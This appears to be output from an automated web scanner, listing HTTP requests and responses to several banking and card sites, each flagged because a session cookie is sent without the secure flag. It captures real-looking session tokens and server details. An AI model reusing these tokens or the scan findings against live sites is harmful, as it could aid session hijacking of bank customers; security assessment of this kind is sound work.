GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:36:54 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUxZnUaDGKWGCoJxP2PirvbbIbzUmIrOERHuiwMPolSaNNQ5cWSBy7b95CCTf%7EtuSCpEBZuXUf7%7EtZPVBrPWpNM7rZHcHCqYnykCjhuJL6fvRIYGe3FpYdQkPM8zrOx5T%7Ec%7Eyr1AYLOtosuf4nU%7EMDUq4y6NqCDoHVlbbaOMInEeRIoePUHloWEbXDshncJ5Z5UWIFbjYOkwE1a_LL0sskmWSkMGutyuilas3jpD8oRmb5BPZakyLOKcySGE_k9p_cRDJ0vpesyV5h3GuToJLqQxr4nRTno7kQzoIVZAvdgfBVYLOBxBWRHz0Pjg0IAxWQWY7y6A%7E5Nb9hainTy3e1DV77bhCz0K%7ExhamkwiceXoBM3BLlAxLVEPseGop_RZXNOP5iHV1RdgkXdSyqrVfB6RNvS4eSZqNF; path=/; httponly RNT-Time: D=123349 t=1296697014631679 RNT-Machine: 03 F5_do_compression: yes Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25309
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:16 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUnG2PM4YlBhARYlemP7Ir7vz_HhKbRP1YLO_iG8sts9DErmpH9oGUWz38ezqOfO6jPPRQothRreGexHLaBcRhH0G6Ip_3g4zPqEOieO2lme9gAmVdWybrtlST1NfjSZpraqJxAqdCUwY2R1aNvTp%7ESnP1RWgZhqb9; path=/; httponly Content-Length: 25572 RNT-Time: D=150572 t=1296691396102170 RNT-Machine: 02 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/webinar HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:05:02 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUxcTSvKQj23TDHZUibRNCb%7E5279X_vQOXrRk9Wlz5gi554VWz%7ElROaR0B_aepenyHaj%7EszXAG5NPbVDw7bozgYfhj%7EONI%7ElkHrzLkTSZqwxKBGsjnnYZ9bSgcgVw3_cL9sWOKmlbZOnY849hkMltAEDoEEHuQ4_1t; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/webinar RNT-Time: D=168719 t=1296691502763223 RNT-Machine: 05 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/webinar/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:47 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUGR7btxDd%7EjlgKRgeiuzFM8p6eU1yRBCBQqdEPwIv_mBJb0QQTkulO2GBOGO8_N3eWzNq_zhrCzbCwS1_2InE_sjrMT_CzzQ4bcd3L%7EVGKEV%7EsWtrcf8hb492HLMcyosrWfnnlKLB3MHiSs0Q4K2kIHOUKE6UBlYK; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/webinar RNT-Time: D=216440 t=1296691487850159 RNT-Machine: 05 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 17909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /citibankV2/prxInput.aspx HTTP/1.1 Host: locations.citibank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 143 Content-Type: text/html; charset=utf-8 Location: /citibankV2/Index.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=1lqcuirll4aur455pgm1mg45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 02 Feb 2011 22:11:31 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fcitibankV2%2fIndex.aspx">here</a>.</h2> </body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/military/login.jsp HTTP/1.1 Host: militarybankonline.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mfnfopwd/ HTTP/1.1 Host: myaccountsaws.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:06 GMT Server: IBM_HTTP_Server Content-Length: 12458 Set-Cookie: JSESSIONID=0001y-jIhHTKM6s3Y1_oSLOT9oS:15cea9hua; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US
<?xml version="1.0" encoding="ISO-8859-1" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: online.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 18175 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/ Date: Wed, 02 Feb 2011 22:02:31 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rate36s.asp? HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19 Content-Type: text/html Set-Cookie: ASPSESSIONIDCQATDDAR=NGIHILFABKDPKDCHAENGBKCJ; path=/ Date: Wed, 02 Feb 2011 22:02:33 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shop/ECC/Account/OlApp.aspx HTTP/1.1 Host: shop.aafes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Set-Cookie: AAFES=R1966950070; path=/ Connection: close Date: Thu, 03 Feb 2011 01:04:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Location: https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx Set-Cookie: ASP.NET_SessionId=2n4tod55edqnia45xomyrlzq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 216
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx">here</a>.</h2>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetIDScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetPasscodeScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/signon.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/ Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: support01.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:00 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3 X-Powered-By: PHP/5.2.3 Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 1713 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signaturesouthwest/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/FUSA_Amazon/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loginout/login.asp HTTP/1.1 Host: www.1sttools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:54:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 11382 Content-Type: text/html Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/ Cache-control: private
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Control.do?body=where_passcode_popup HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:48 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000hLN0EFuVu6_KB0QSkbXPq6x:12qb4k4pc; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: ngen_throttle=497; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: hp_beta=B; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:48 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-cards/cardoverview.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:02 GMT Content-length: 0 Content-type: text/html Set-Cookie: SMIDENTITY=OCd1eUfyEcTBcdzRmikiUYt9Hcisc1Gh1u9btfXo6jk2iYwtjhebVw1nhgFF6KlmpRdXfWP6oAE1ISBtgIxM3LdoctvAzX27T3D45PQOpMJUeowFgmjuCz+RpSn04+9WLMmF4p/3qP0PVzBHFGFRkzwE5OaT/L0iv4fa0f523oTajKE7dlB/qRvRq16VC3uwSY8nOHjQWKuYZVD9y/EOzzuIC2pbtUE0yVubP+/mxg6D0sevE7x0PoB27bkshtOSL/Y89tKz1feb+T0FxZmgtayMUMoPsHrOu12vLkQLE2hAqZxHc87W+lL+ksrLFRBrg4mECaTf+Y2rhBFThgksB7a7YrXy+P+M1KZi7PFBOBkLBEHb3SHeMWenl/tgGDcsiPv5/+zELJAWZV22EzuihOycvz+1s2wi3UZYCS29J/mO6EQk8LZM1BJ2vaI7/Ay00YstlYJeyAGWhaR17eKkiv9oj3iMJJS7V2AOTwlg0pwItcgPIQ2pQAGe75FFiHk7; path=/; domain=.bankofamerica.com; secure Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards Content-language: en-US Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:53 GMT Content-length: 0 Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/deposits/index.action Content-language: en-US Set-cookie: JSESSIONID=0000sNWjiXby7ONUwh45995dJgv:12qb4k93q; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:52 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/WidgetAction.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:36:37 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Content-Length: 11 Set-Cookie: JSESSIONID=00003PfGoFif26Fdykwp9gAzvj_:15bvh4s8c; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Via: On-Demand Router/1.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/overview.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
